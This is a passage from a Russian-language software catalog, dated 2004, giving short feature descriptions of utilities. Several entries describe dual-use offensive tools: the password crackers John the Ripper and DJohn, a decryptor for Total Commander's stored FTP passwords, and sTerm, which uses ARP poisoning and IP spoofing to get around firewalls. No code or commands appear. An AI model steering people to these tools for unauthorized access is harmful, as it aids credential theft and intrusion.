+ Возможность контроля любого порта компьютера, с одновременным отображением группы регистров и бит, где нулевой регистр - базовый, остальные + 1…+7, соответственно. Ведение LOGa данных базового регистра.
ОС: All Win
Тип программы: Железо

7/11/2004 UnRAR DLL
Разнообразные средства для разработчиков программного обеспечения, которые позволят распаковывать RAR архивы. Существует несколько вариантов поставки:
+ динамическая библиотека UnRAR.dll;
+ консольная программа для различных ОС;
+ библиотека libunrar.so для Linux и компонент TUnrar для Kylix;
+ компонент для Delphi использующий возможности UnRAR.dll;
+ исходные коды функций на C++.
ОС: Cross-platform
Тип программы: Программирование

6/11/2004 Recovery Is Possible
Комплект пограмм, представляющих из себя файл-образ загрузочной дискеты или CD, с помощью которых можно восстанавливать систему после сбоев или просто производить профилактическое обслуживание системы. Программа поддерживает следующие файловые системы: Reiserfs, ext2/3, iso9660, UDF, XFS, JFS, UFS, HPFS, MINIX, MS-DOS, NTFS, UMSDOS и VFAT. Есть поддержка работы через Ethernet, DSL и кабельное соединение.
ОС: Unix
Тип программы: Восстановление информации

5/11/2004 Dragon UnPACKer
Программа для распаковки и сохранения ресурсов (текстуры, видеоролики, мелодии) большинства популярных компьютерных игр (GTA3, Quake 2/3, Unreal 2, Jedi Knight, Painkiller и около 100 других). Читает архивы специфические для каждой игры (конкретные расширения можно узнать в readme.txt), может сканировать произвольный файл на наличие в нём вложенных данных известного формата.
ОС: All Win
Тип программы: Реверсинг

4/11/2004 Graphical Boot Manager
Бутменеджер, поодерживающий автоматическое определние 9 ОС. Основные возможности программы:
+ таймер для загрузки ОС, выбранной по-умолчанию;
+ установка пароля на загрузку системы или индивидуально для каждой ОС;
+ графический интерфейс, с иконками для каждой ОС;
+ скрытие главного раздела жесткого диска для возможности установки дополнительной ОС;
+ поддержка дисков объемом до 4 Тб(4096 Гб);
+ поддержка работы с ОС, имеющих возможность загрузки в "Безопасном режиме";
+ ... и многое другое.
ОС: All Win
Тип программы: Дисковые утилиты

3/11/2004 SquidClamAV
Программа обеспечивает проверку трафика на выявление вирусной активности при помощи анализа squid трафика, при обнаружение вирусов может быть задействована специальная переадресация предназначенная для вырезания вирусов из транзитного трафика, используя антивирусный пакет ClamAV. Программа написана на языке Python.
ОС: Unix
Тип программы: Антивирусная защита

2/11/2004 RightMark Memory Analyzer
Программа для выяснения стабильности работы и низкоуровневых характеристик CPU/Chipset/RAM подсистем. В качестве низкоуровневых характеристик системы можно перечислить латентность и реальную пропускную способность оперативной памяти, среднюю/минимальную латентность различных уровней кэша и степень его ассоциативности, реальную пропускную способность шины L1-L2 кэша, характеристики уровней TLB. Таким образом, можно смело утверждать, что подобный тестовый пакет, объединяющий в себе целый ряд подтестов, предназначенных для измерения объективных характеристик элементов системы, крайне необходим для оценки важнейших объективных характеристик платформы в целом.
ОС: All Win
Тип программы: Железо

1/11/2004 Startup Control Panel
Программа добавляет еще один апплет в "Панель управления", с помощью которого вы сможете отслеживать программы, находящиеся у вас в автозагрузке. Программа имеет очень маленький размер, не требовательна к ресурсам.
ОС: All Win
Тип программы: Системные утилиты

31/10/2004 QReplacer
Универсальное средство для работы над текстом. Основные возможности программы: замена текста в нескольких файлах, создание строк, например, ссылок с различными параметрами, деление больших файлов, переименование и создание необходимого количества файлов с определённым текстом. Программа требует бесплатной регистрации.
ОС: Win Me/2k/XP
Тип программы: Текстовые утилиты

30/10/2004 XP-AntiSpy
Утилита для отключения "подозрительных" или "лишних" функций Windows XP, таких как автообновления системы, отправки отчета об ошибках, автозапуска MSN Messenger или идентификации плеера. Представляет собой удобную оболочку для доступа к ключам реестра, отвечающим за отключение этих и многих других - всего более двадцати - "подозрительных" функций операционной системы. Программа имеет русский интерфейс.
ОС: Win XP
Тип программы: Системные утилиты

29/10/2004 Peer2Mail
Программа, которая позволяет автоматизировать процесс хранения и совместного использования файлов, сохраненных в ящике вашей электронной почты. Если у вас есть e-mail с большим объёмом , то вы можете использовать эту программу для хранения там файлов и использовать этот почтовый ящик в виде файлового сервера для обмена файлами. Эта программа разбивает на части файл, который вы хотите поместить, и посылает эти части на ваш почтовый ящик. Таким же образом с помощью программы вы сможете загрузить с почтового ящика все части необходимого вам файла, а затем объединить все части файла воедино.
Программа поддерживает:
+ использование шифрования для разбитых частей файла с помощью алгоритма шифрования AES, что позволит устанавливать пароли для доступа к тем или иным частям;
+ автоматическое архивирование частей файлов перед отправкой;
+ программа имеет встроенный SMTP сервер для отправки писем.
ОС: Win NT/2k/XP
Тип программы: Почта

28/10/2004 MySQL
Самая популярная, относительно небольшая и быстрая реляционная СУБД. Основные возможности и особенности программы:
+ многопоточность;
+ поддержка нескольких одновременных запросов;
+ оптимизация связей с присоединением многих данных за один проход;
+ записи фиксированной и переменной длины;
+ ODBC драйвер в комплекте с исходником;
+ гибкая система привилегий и паролей;
+ до 16 ключей в таблице, при этом каждый ключ может иметь до 15 полей;
+ поддержка ключевых полей и специальных полей в операторе CREATE;
+ поддержка чисел длинной от 1 до 4 байт (ints, float, double, fixed), строк переменной длины и меток времени;
+ интерфейс с языками C и perl;
+ основанная на потоках, быстрая система памяти;
+ встроенная утилита проверки и ремонта таблицы (isamchk);
+ все данные хранятся в формате ISO8859_1;
+ все операции работы со строками не обращают внимания на регистр символов в обрабатываемых строках;
+ псевдонимы применимы как к таблицам, так и к отдельным колонкам в таблице;
+ все поля имеют значение по умолчанию.
+ функция INSERT может использоваться на любом подмножестве полей;
+ легкость управления таблицей, включая добавление и удаление ключей и полей;
+ ... и многое другое.
ОС: Cross-platform
Тип программы: Базы данных

27/10/2004 sTerm
Telnet-клиент, который обладает уникальной возможностью скрытия вашего реального IP адреса и подмены его на IP адрес доверенного хоста, что в большинстве случаев позволяет обойти ограничения firewall и других программ-серверов имеющих привязку к конкретным IP адресам. Для реализации этой возможности используются следующие методы: ARP Poisoning, MAC Spoofing и IP Spoofing. Для работы программы необходима библиотека WinPcap.
ОС: Win NT/2k/XP
Тип программы: Сетевые утилиты

26/10/2004 NetTime
Лучшая в своем роде программа для синхронизации времени с серверами точного времени. Отличительной особенностью данной утилиты является: нетребовательность к ресурсам, простейший и понятный интерфейс, не содержащий лишних элементов и высокая функциональность. Основные возможности программы:
+ полная поддержка SNTP и RFC868;
+ возможность создания сервера точного времени на собственном компьютере;
+ синхронизация времени через заданный промежуток времени;
+ большая встроенная база адресов серверов точного времени по всему миру;
+ информационная иконка в трее;
+ автонастройка на самый быстрый сервер.
В операционных системах, основанных на технологии NT, таких как MS Windows NT/2k/XP существует возможность автозапуска в виде сервиса.
ОС: Win 9x/Me/2k/XP
Тип программы: Сетевые утилиты

25/10/2004 Filemon
Программа для регистрации обращений к файлам в реальном времени, что позволяет определить как и какие файлы или DLL'ки используют приложения в своей работе. Выводимая статистика содержит название приложения, время обращения, вид запроса(открытие, закрытие, чтение или запись), результат операции, а также некоторые дополнительные сведения. Существует функция поиска по статистике и возможность применения различных фильтров на выводимую статистику.
ОС: All Win
Тип программы: Мониторинг системы

24/10/2004 Regmon
Программа позволяет в реальном времени наблюдать обращения к реестру запущенных программ. Статистика обращений предоставляется в расширенном виде: показываются пути, с которыми работает программа, вид операции, время доступа и результат операции. Существует возможность применения различных фильтров к выводимой статистике, например это можно использовать для отслеживания обращений к реестру какого-то конкретного процесса/программы или обращений всех программ к какому-то конкретному разделу реестра.
ОС: All Win
Тип программы: Мониторинг системы

23/10/2004 InterChat
Программа для организации чата в локальной сети, имеет следующие возможности:
+ автоматическое определение активных пользователей;
+ возможность вести чат как с одним, так и с многими пользователями;
+ созднание автоответчика;
+ передача файлов;
+ поддержка смайликов;
+ ведение логов сообщений;
и многое другое.
Программа очень проста в использовании и настройке.
ОС: All Win
Тип программы: Чат

22/10/2004 IP Sorcery
Программа, позволяющая генерировать IP, TCP, UDP и ICMP пакеты, которые могут быть использованы для тестирования firewall. Программа имеет графическую оболочку, но при использовании в консольном виде появляется дополнительная возможность генерировать и отправлять IGMP, RIP и OSPF пакеты, а также отслеживать ответы на отправленные пакеты.
ОС: Unix
Тип программы: Сетевые утилиты

21/10/2004 Flat Assembler
Ассемблер для х86 платформ, обладающий высокой скоростью работы и алгоритмом оптимизации кода для уменьшения конечного размера программ. Поддерживает все 8086-80486/Pentium инструкции и MMX, SSE, SSE2, SSE3, 3DNow! расширения. Выходные данные могут быть скомпилированны в следующие форматах: MZ, PE, COFF или ELF.
ОС: Cross-platform
Тип программы: Программирование

20/10/2004 BillSniff
Сниффер предназначенный для анализа сетевого трафика по большинству известных протоколов(ipv4, tcp, udp, ieee 802.2 frame, ethernet II frame, llc, ipx, nbipx, netbios, snap, arp, rarp, bdpu, smb, icmp, igmp, sap*, ripx). Анализ трафика производится в реальном времени с возможностью применения к выводимым данным различных фильтров. Статистика может быть сохранена в лог-файле и/или представлена в виде графиков. Дополнительной функцией программы является отправка произвольных пакетов с заданными параметрами. В программе реализована возможность расширения функций при помощи скриптов.
Для работы программы необходима библиотека WinPcap.
ОС: All Win
Тип программы: Мониторинг сети

19/10/2004 Zyxmon
Программа предназначена для отслеживания состояния ADSL модема Zyxel Prestige (Zyxel OMNI ADSL LAN), настроенного в режиме маршрутизатора и для управления маршрутизатором. Основные функции программы:
+ установка/разрыв PPPoE соединения по SMT протоколу (Telnet);
+ ведение лога SMT;
+ встроенный Unix syslog daemon для Windows;
+ определение текущей скорости с помощью SNMP протокола;
+ встроенный DynDNS клиент;
+ встроенный Telnet клиент;
+ ... и др.
ОС: All Win
Тип программы: Железо

18/10/2004 AutoIt
Язык для написания сценариев, напоминающий BASIC. Основным его назначением является автоматизация работ с Windows GUI (графическим интерфейсом пользователя MS Windows). Для выполнения этой сложной задачи предоставляется комбинация испытанных методов, включающих в себя - симуляцию нажатий комбинаций клавиш клавиатуры, перемещения указателя мыши и управления окнами и его визуальными элементами.
Основные возможности программы:
+ Запускать на выполнение Windows и DOS программы;
+ Симулировать нажатия комбинаций клавиатуры (поддерживается основная масса раскладок клавиатуры);
+ Симулировать перемещения указателя мыши и нажатия на ее кнопки;
+ Перемещать, менять размер и управлять параметрами отображения окон;
+ Непосредственно взаимодействовать с "управляющими элементами" (controls) окна (получать/менять надпись, перемещать, отключать, и т.п. действия);
+ Работать с буфером обмена для пересылки его текстового содержания;
+ Читать, менять и создавать ключи и значения реестра.
На сайте программы вы сможете найти подробное описание всех функций программы на русском языке.
ОС: All Win
Тип программы: Программирование

17/10/2004 NTSend
Программа представляет из себя продвинутую графическую оболочку для встроенной в ОС S Windows системы сетевых сообщений netsend. Программа не требует инсталяции, обладает функцией автоматического сканирования доступных получателей в сети с возможностью сохранения полученного списка пользователей и импорта из него пользователей при следующих запусках программы, возможность выбора одного или нескольких получателей, а также некотрые другие функции. На сайте программы представлен исходник программы на языке программирования Delphi 6.
ОС: Win NT/2k/XP
Тип программы: Чат

16/10/2004 xpy
Небольшая утилита, которая позволяет отключить наиболее опасные функции/сервисы ОС, которые могут привести к ухудшению защиты операуионной системы. Основные функции программы:
+ отключение функции "calling home";
+ отключение неиспользуемых или небезопасных сервисов;
+ частичное или полное отключение функций Internet Explorer;
+ частичное или полное отключение функций Windows Media Player;
+ удаление Windows Messenger;
+ улучшение защищенности компьютера;
+ повышение эффективности настроек.
ОС: Win 2k/XP
Тип программы: Системные утилиты

15/10/2004 TestDisk
Утилита, предназначенная для проверки и восстановления разделов жесткого диска. Она работает со следующими типами файловых систем: FAT12 FAT16 FAT32, Linux EXT2/EXT3, Linux SWAP (version 1 and 2), NTFS (Windows NT/W2K/XP), BeFS (BeOS), UFS (BSD), Netware и ReiserFS.
ОС: Cross-platform
Тип программы: Дисковые утилиты

14/10/2004 webCDwriter
Пакет программ, позволяющий производить запись на CD и DVD диски по сети. Состоит из сервера CDWserver и клиентов - webCDcreator и rcdrecord.
ОС: Unix
Тип программы: Дисковые утилиты

13/10/2004 TestMaker
Программа для проверки веб-сервисов (HTTP, SOAP, .NET, XML-RPC, и др.) на функциональность и производительность. Кроме этого, программа содержит язык сценария, который позволяет создавать интеллектуальных испытательных агентов и модулей, позволяющий имитировать реальные действия, с которыми могут столкнуться веб-сервисы, в том числе вирусное нападение и другие действия, которые могут повлиять на работу веб-сервисов.
ОС: Cross-platform
Тип программы: Аудит безопасности

12/10/2004 Darik's Boot and Nuke
Система начальной загрузки, которая позволяет за короткое время удалить всю информацию с любого жесткого диска, обнаруженного в системе, без возможности восстановления.
ОС: Cross-platform
Тип программы: Уничтожение данных

11/10/2004 Dovecot
Программа, представляет из себя POP3 и IMAP сервер, разработанный с расчетом на максимальную безопасность и надежность.
ОС: Unix
Тип программы: Почта

10/10/2004 PHP Designer 2005
Многофункциональный HTML редактор, ориентированный на профессиональных веб-дизайнеров, работающих с PHP скриптами(содержит полную библиотеку всех команд PHP с описанием). Программа обеспечивает подсветку синтаксиса введенного кода с учетом встроенной расширенной библиотеки следующих языков: PHP, HTML, XHTML, CSS и SQL (Ingres, Interbase, MSSQL, MySQL, Oracle, Sybase и Standard SQL), а также имеет разделенный по категориям список функций для каждого языка, из которого можно выбрать необходимую для вставки команду. Имеет встроенный FTP-клиент для облегчения загрузки отработанного материала на веб-сайт и встроенную систему напоминания ToDo. Благодаря настраиваемому интерфейсу (интерфейс в XP стиле, 18 встроенных тем оформления) и богатым функциональным возможностям (менеджер проектов, библиотека кодов, работа с шаблонами, запуск и просмотр PHP скриптов внутри редактора и многое др.), данный редактор можно считать лучшим в своем роде, и его можно рекомендовать не только профессионалам, но и начинающим веб-дизайнерам.
ОС: All Win
Тип программы: HTML

9/10/2004 DBFNavigator
Программа для просмотра и редактирования файлов DBF. Основные возможности программы:
+ возможность сохранения настроек для каждого файла;
+ поддерживаются версии от dBase до Visual FoxPro;
+ может читать мемо поля dBase и FoxPro форматов;
+ поддерживаются OEM и ANSI кодировки;
+ перекодировка из OEM в ANSI и обратно;
+ выделение, копирование и вставка группы ячеек;
+ редактирование структуры;
+ сортировка;
+ фильтр;
+ поиск;
+ печать.
А также главной отличительной особенностью программы от других подобных, является независимость от внешних драйверов для доступа к базам данных (например ODBC, BDE, MS Jet). Программа имеет русский интерфейс.
ОС: All Win
Тип программы: Базы данных

8/10/2004 Cctde
Основная задача данного программного продукта - это регистрация создания туннелей или скрытых каналов в локальной сети, использующих HTTP протокол, но с помощью алгоритмов, реализованных в программе, возможно отслеживание произвольных потоков данных и в других протоколах. Программа для своей работы использует логи NIDS Snort'а и pcap пакеты из Unix сокета.
ОС: Unix
Тип программы: Мониторинг сети

7/10/2004 PlasticSniffer
Очень простой в использовании и маленький по размеру дистрибутива сниффер, позволяющий быстро и легко просматривать проходящий сетевой трафик. К достоинствам данного сниффера можно отнести следующие:
+ маленький размер;
+ нетребовательность к ресурсам;
+ простота в использовании;
+ применение различных фильтров (фильтрация данных по IP, номеру порта и др.).
Для своей работы требует установленную библиотеку .NET Framework v1.1.
ОС: Win 2k/XP
Тип программы: Мониторинг сети

6/10/2004 Magic Mail Monitor
Программа мониторинга неограниченного числа почтовых (POP3) ящиков. Есть возможность установки разных временных интервалов на проверку заданных почтовых ящиков, при обновлении состояния почтового ящика происходит звуковое или текстовое уведомление. Кроме обычного просмотра заголовков сообщений, возможно произвести быстрый ответ/отправку почты, встроен настраиваемый фильтр спама.
ОС: All Win
Тип программы: Почта

5/10/2004 SendIP
Программа, позволяющая редактирование и создание заголовков RIP, RIPng, BGP, TCP, UDP, ICMP или IPv4/IPv6 пакетов, при этом правильная контрольная сумма может быть расчитана автоматически, но так же поддерживается отправка пакетов с неправильной контрольной суммой.
ОС: Unix
Тип программы: Сетевые утилиты

4/10/2004 WinID
Маленькая, но очень полезная утилита, которая позволит быстро и легко получить подробное описание о находящемся в данный момент под указателем мыши объекте. Описание включает в себя следующую информацию:
+ позиция курсора;
+ название класса;
+ уникальный идентификатор - Handle;
+ стиль класса;
+ заголовок;
+ информацию о "родителе" с указанием его hWnd;
+ и некоторую другую полезную информацию.
ОС: All Win
Тип программы: Программирование

3/10/2004 Baby FTP Server
Простейший FTP сервер, который может понадобиться, при необходимости быстро и легко организовать FTP-сервер на вашем компьютере. Для организации FTP-сервера необходимо просто запустить программу и указать в параметрах директорию, к которой требуется разрешить доступ, с заданными параметрами: разрешение создания директорий, разрешение download/upload файлов, разрешение на переименование и удаление файлов. Созданный таким образом FTP-сервер поддерживает только анонимные подключения. Главной особенностью программы является ее простота в использование и маленький размер дистрибутива.
ОС: All Win
Тип программы: FTP

2/10/2004 NeTAMS
Эта программа выпоняется как фоновый сервис (демон) под управлением операционных систем Solaris, FreeBSD и Linux. Она собирает данные об IP-трафике, поступающие от вашего маршрутизатора на базе ПК/UNIX или Cisco, фильтрует, суммирует, сохраняет в HASH или SQL базу данных, создает SMTP/HTML отчеты для администратора сети. Возможно также применение гибких политик доступа и фильтрации, контроль доступа, квоты, внешняя авторизация, мониторинг, планировщик заданий и многое другое.
ОС: Unix
Тип программы: Мониторинг сети

1/10/2004 DJohn
Основное назначение этого программного продукта - созданией некой распределённой сети для ускорения процесса взлома пароля, который основан на алгоритме работы популярного взломщика John The Ripper. Управляет распределением работы и ресурсов сервер под управлением djohnd, он же занимается координацией работы клиентов (программа djohn).
ОС: Unix
Тип программы: Взломщики паролей

30/09/2004 John the Ripper
Один из лучших по функциональным возможностям и скорости перебора паролей взломщик хэшей паролей. Поддерживает автоопределение типа хэша, позволяет подбирать пароль практически ко всем наиболее используемым алгоритмам: DES, BSDI, MD5, BF, AFS, LM и другим. Существует несколько режимов перебора, основные из них - это подбор пароля по словарю и по символьный перебор с использованием заданной маски.
ОС: Cross-platform
Тип программы: Взломщики паролей

29/09/2004 MAC Changer
Программа, позволяющая легко изменять MAC адрес сетевой карты. Существует возможность замены на произвольный MAC адрес или утановить его выбрав из встроенной БД MAC адресов, в которой находится информация о более чем 6800 производителях.
ОС: Unix
Тип программы: MAC

28/09/2004 PuTTY
Программа представляет собой многоплатформенный Telnet/SSH клиент с возможностью эмуляции xterm терминала.
ОС: Cross-platform
Тип программы: Сетевые утилиты

27/09/2004 Total Commander FTP Password Ripper
Небольшая утилита для расшифровки паролей встроенного FTP-клиента в Total Commander (Windows Commander), хранящихся в файле настроек wcx_ftp.ini. Результат расшифровки может быть сохранен в .html файле.
ОС: All Win
Тип программы: Взломщики паролей

26/09/2004 HashCalc
Простая в использование утилита для вычисления хэшей, контрольных сумм и HMACs. Программа поддерживает наиболее популярные алгоритмы, такие как: MD2, MD4, MD5, SHA-1, SHA-2( 256, 384, 512), RIPEMD-160, PANAMA, TIGER, ADLER32, CRC32, в том числе алгоритм основанный на MD4 для eDonkey сети. Имеет два режима работы HASH/CHECKSUM и HMAC. Возможность обработки 3х типов входных данных: текст, файлы всех типов и HEX. Поддерживает функцию drag'n'drop - для генерации хэшей достаточно перетащить необходимый объект в окно программы. Умеет работать с файлами большого размера.
ОС: All Win
Тип программы: Файловые утилиты

25/09/2004 Linux Security Auditing Tool
Утилита для проведения аудита безопасности, направленного на обнаружение потенциальных "дыр" в настройках операционной системы и прикладных программах. При проверке безопасности системы происходит анализ различных уязвимых мест, таких как пустые пароли, открытые для общего доступа системные каталоги и т.п., в случае обнаружения таковых, программа выдаст соответствующие предупреждения.
ОС: Unix
Тип программы: Аудит безопасности

24/09/2004 Easy Burning
Программа для создания резервной копии ваших данных на CDR(W) дисках. Имеет простой интерфейс, возможность встраивания в оболочку, поддерживает мультисессию.
ОС: Cross-platform
Тип программы: Резервное копирование

23/09/2004 Pure-FTPd
Многоплатформенный и мультиязыковый FTP сервер обладающий высокой скоростью работы, высокой надежностью и гибкостью настроек, основан на ядре Troll-FTPd. Обладает следующими особенностями: поддерживает PAM, IPv6, виртуальные домены, встроенный 'ls', FXP протокол, система anti-warez, ограничение трафика, выделение портов для пассивной загрузки, полная поддержка LDAP, генерация отчетов в XML формате и многое другое.
ОС: Cross-platform
Тип программы: FTP

22/09/2004 XtremeEraser
Программа предназначенная для очистки вашей ситемы от ненужных файлов, следов прибывания в Интернете и встроенных в ОС MS Windows cтандартных приложений.
Основные возможности программы:
+ удаление файлов заданного типа, тип файлов выбирается из списка(Driver Cache, Help Files, DLL Cache, Service Pack Install Files, ActiveX Cache, AppPatch, Tempory Directories, Debug Information, Speech, MS-Agent, Repair Information, Windows Tour, Offline Web Pages, Web Directory, Screen Savers, Cursors, Sounds, Images, Tmp, BAK и другие);
+ удаление компонентов MS Windows, таких как Outlook Express, Media Player, NetMeeting, MSN Messenger, Movie Maker и других;
+ очистка различных кэшей, списков историй и cookies из следующих браузеров: Internet Explorer, Mozilla/Netscape, Opera, FireFox, K-Meleon;
+ возможность удаления программ или записей о программах списка "Установки и удаления программ", программа также обеспечивает доступ к скрытым записям.
Главной особенностью программы можно считать быстроту ее работы и очень маленький размер дистрибутива(~35Кб).
ОС: All Win
Тип программы: Системные утилиты

21/09/2004 VertrigoServ
Программный комплекс для организации полнофункционального веб-сервера, который включает в себя следующие компоненты: Apache, PHP, MySQL, PhpMyAdmin, ZendOptimizer. В данный программный комплекс встроена специальная утилита предназначенная для управления всеми установленными компонентами веб-сервера. Использование одного установочного файла для всех программ намного упрощает весь процесс установки и настройки веб-сервера. Примерный размер этого программного комплекса составляет ~7.5Мб.
ОС: All Win
Тип программы: HTTP

20/09/2004 LanCalculator
Данная утилита позволит вам без труда рассчитать диапазон адресов в подсети и маски подсети, а также широковещательный адрес, адрес сети, префикс сети и инверсию маски сети, которая используется в списках доступа (ACL) сетевого оборудования Cisco. Введите адрес и маску сети, нажатием одной кнопки вы сможете рассчитать все параметры. Для наглядности добавлены дополнительные виды отображения в двоичной, десятичной или шестнадцатеричной нотации.
ОС: All Win
Тип программы: Сетевые утилиты

16/09/2004 Whisper32
Менеджер паролей, из особеностей программы можно выделить следующие: возможность парольной защиты, сохранение всех паролей в одном файле, наличие встроенного генератора паролей, возможность задать срок действительности пароля, автоматическое создание резервной копии архива паролей и понятный простой интерфейс.
ОС: All Win
Тип программы: Менеджеры паролей

15/09/2004 Yoda's Protector
Мощный протектор и упаковщик для исполняемых EXE файлов, обладающий рядом преимуществ относительно подобных разработок:
+ поддержка большинства форматов PE (Portable Executable) файлов;
+ маленький размер дистрибутива;
+ быстрота работы;
+ полиморфическое шифрование;
+ запрет отладки API функций;
+ обнаружение SoftICE;
+ проверка CRC суммы;
+ переадресация API функций;
+ функция анти-дампинга;
+ удаление заголовков PE;
+ анти-дебаггер;
+ оптимизация DOS заголовков;
+ ... и многое другое.
ОС: All Win
Тип программы: Программирование

14/09/2004 MediaKey
Программа предназначена для настройки действий при нажатии на дополнительные (мультимедиа) клавиши мультимедийных клавиатур, кроме этого возможно переназначать действия и для обычных клавиш. Поддерживается работа с различными клавиатурами, в том числе и подключенными по USB.
Основные возможности программы:
+ возможность назначить комбинации клавиш в сочетании с Ctrl, Shift и Win;
+ управление медиаплеерами WinAmp 2/3/5, Windows Media Player, JetAudio 5/6, foobar2000, Quintessential;
+ управление громкостью с возможностью изменения шага;
+ запуск стандартных, а также пользовательских программ в различных режимах;
+ открытие системных и пользовательских папок;
+ управление Проводником;
+ управление питанием: выключение/перезагрузка/ждущий/спящий/монитор;
+ управление CD-ROM`ом: открыть/закрыть/play/pause/next;
+ управление браузерами Internet Explorer/Opera;
+ действия над окнами (свернуть все/развернуть/закрыть/поверх всех/заблокировать);
+ русскоязычный интерфейс;
+ настраиваемое OSD меню с большими возможностями;
+ вcтавка и отображение даты и времени с заданым шаблоном;
+ вставка заданного заранее текста;
+ поддержка профилей настроек;
+ ... и многое другое.
Достойная замена стандартным программам, поставляемым с большинством клавиатур.
ОС: Win NT/2k/XP
Тип программы: Железо

13/09/2004 Autoclave
Программный комплекс, распространяемый как IMG образ для дискеты объемом 1.44Mb, который позволяет производить полную очистку всех данных на жестком диске без возможности их восстановления. Существует 5 режимов очистки, режимы отличаются друг от друга тщательностью очистки и временем, которое затрачивается на процедуру зачистки информации.
ОС: Cross-platform
Тип программы: Уничтожение данных

12/09/2004 Mozilla Backup
Утилита для создания резервной копии профилей таких программ как: Mozilla, Mozilla Firefox, Mozilla Thunderbird и Netscape. Она поможет вам сохранять почту, закладки, адресные книги, пароли и т.д. Программа имеет русский интерфейс.
ОС: All Win
Тип программы: Восстановление информации

11/09/2004 Decode borisba
Утилита для перекодировки файлов и буфера между WIN, KOI, ALT, ISO, MAC, TRANSLIT. Программа имеет следующие возможности: вы можете самостоятельно определять перекодировку специальных символов, задавая их в .ini файле, исправление текста, набранного в неправильной раскладке, создание собственной таблицы для перекодировки, перекодировка многих файлов за один прием. Достоинством программы является небольшой размер, правильная работа с русской страницей (1251) юникода и то, что пограмма не требует инсталляции.
ОС: All Win
Тип программы: Текстовые утилиты

10/09/2004 BearWare TeamTalk
Программа для организации голосовой конференции в Интернете или в локальной сети. Существует возможность создания приватных дискуссий и общих конференций, из дополнительных функций можно выделить: обмен текстовыми сообщениями, автоподключение, для приватных дискуссий предусмотрена парольная защита и многое другое.
ОС: All Win
Тип программы: Чат

9/09/2004 GeeXboX
ISO образ загрузочного диска, который позволяет из довольно старого компьютера сделать настоящий мультимедиа центр. Этот загрузочный диск понадобится только на этапе загрузки, т.е. вы загружаетесь с этого CD для того, чтобы необходимые программы загрузились в память компьютера, после чего компакт-диск можно извлечь из привода за ненадобностью. Благодаря этому программному комплексу вы сможете открывать следующие форматы данных: DVD, audio-CD, VCD/SVCD, XCD [XCD содержат файлы типа OGG, MPEG4, VP3, DIVX, XVID, JPG и т.п. мультимедиа-данные] ) или данные с жесткого диска(поддерживаются практически все популярные файловые системы), в том числе USB Flash, и сетевых общедоступных дисковых ресурсов. Минимальные требования к компьютеру: P200-MMX, 64MB RAM, 2MB VideoRAM. Для работы программы не требуется установка какой-либо ОС и не обязательно наличие жесткого диска в системе.
ОС: Cross-platform
Тип программы: Прочее

8/09/2004 WebCleaner
HTTP прокси, который предназначен для очистки необходимой информации от различного рода баннеров, всплывающих окон, скриптов, кроме этого он может блокировать анимационные GIFы, удалять/добавлять HTTP заголовки, осуществлять фильтрацию по содержимому и производить сжатие документов "на лету" при помощи gzip. Поддерживает HTTP/1.1 и Proxy Authentication.
ОС: Cross-platform
Тип программы: HTTP

7/09/2004 SwitchIP Address
Программа, которая позволяет изменять IP конфигурацию компьютера одним кликом мышки. Эта программа будет полезна владельцам ноутбуков, которым приходится постоянно изменять сетевые настройки при подключении своего компьютера к разным сетям. Для запуска и корректной работы программы необходимы привилегии Администратора.
ОС: Win 2k/XP
Тип программы: Сетевые утилиты

6/09/2004 SecurEngine Professional
Программа позволяет шифровать файл(ы) и каталог(и) в один упакованный архив с использованием различных методов шифрования: AES, BlowFish, Gost, triple-DES. Кроме этого еще одной возможностью программы является скрытие файл(ов) и каталог(ов) в файлы следующих форматов: BMP, GIF, PNG или HTM. Дополнительные возможности программы: удаление файлов без возможности восстановления и создание самораспаковывающихся зашифрованных архивов (EXE файлов защищенных паролем). Благодаря иконке программы, которая располагается в системном лотке, вы быстро сможете получить доступ ко всем функциям программы.
ОС: All Win
Тип программы: Стеганография

5/09/2004 uvScreenCamera
Утилита для быстрого создания демонстрационных и обучающих фильмов. Запись всего происходящего на экране производится в специальном сжатом видео-формате, благодаря которому, например 2-х минутный видео-ролик с разрешением экрана 1024x768x32бит занимает всего 194 Кб. Полученный видео-ролик возможно разделить на именованные сегменты, добавить подписи и/или указывающие выноски.
ОС: All Win
Тип программы: Прочее

4/09/2004 Nmap
Программа предназначена для получения подробной информации об открытых портах и сервисах/службах открывших их, сканирование может производиться по следующим протоколам: UDP, TCP, ICMP и др.. Как объекты сканирования могут выступать все компьютеры большой вычислительной сети или отдельно взятый компьютер этой сети. Существует большое количество различных методов сканирования: Vanilla TCP connect(), TCP SYN (полуоткрытое), TCP FIN, TCP ftp proxy (bounce attack), определение операционной системы удаленного хоста с использованием TCP/IP Fingerprinting, Xmas или NULL ("невидимое") сканирование, динамическое вычисление времени задержки и повтор передачи пакетов, многопоточное сканирование, определение неактивных хостов методом ping-опроса, сканирование с использованием ложных хостов, определение наличия пакетных фильтров, прямое (минуя portmapper) RPC сканирование, SYN/FIN сканирование с использованием IP-фрагментации и некоторые другие.
ОС: Cross-platform
Тип программы: Сетевые сканеры

3/09/2004 Unofficial Windows98 SE Service Pack
Неофициальный сервис-пак для ОС MS Windows 98 Second Edition. Данный сервис-пак расширяет возможности ОС и устраняет существующие неудобства и проблемы связанные с ее работой.
Основные дополнения и обновления, получаемые после установки данного сервис-пака:
+ около 72 различных исправлений;
+ решение проблемы с сообщением "Недостаточно памяти" при установленном большом объеме памяти;
+ улучшен "Блокнот";
+ оптимизированна работа со свап-файлом;
+ улучшенное отображение иконок системного трея при 256 цветах;
+ лучшая поддержка WDM и USB;
+ поддержка USB 1.x Mass Storage Device;
+ Adaptec ASPI 4.60.1021 драйвера;
+ Windows Scripting Host 5.6;
+ DCOM98 1.3;
+ OLE Automation Libraries 2.40.4522;
+ Dial-Up Networking 1.4;
+ Microsoft Installer 2.0;
+ Microsoft Layer для Unicode;
+ Visual Basic 5.0 SP2 библиотеки;
+ Visual Basic 6.0 SP6 библиотеки;
+ Visual C++ 6.0 SP6 библиотеки;
+ обновление JET 3.5 файлов до JET 3.5 SP3;
+ поддержка программы 98lite 4.7;
+ иконки Рабочего стола из Windows ME;
+ цветовая схема Windows 2000;
+ выбор любого пути для "Program Files";
+ и др.
ОС: Win 98 SE
Тип программы: Патчи

2/09/2004 DHE Editor
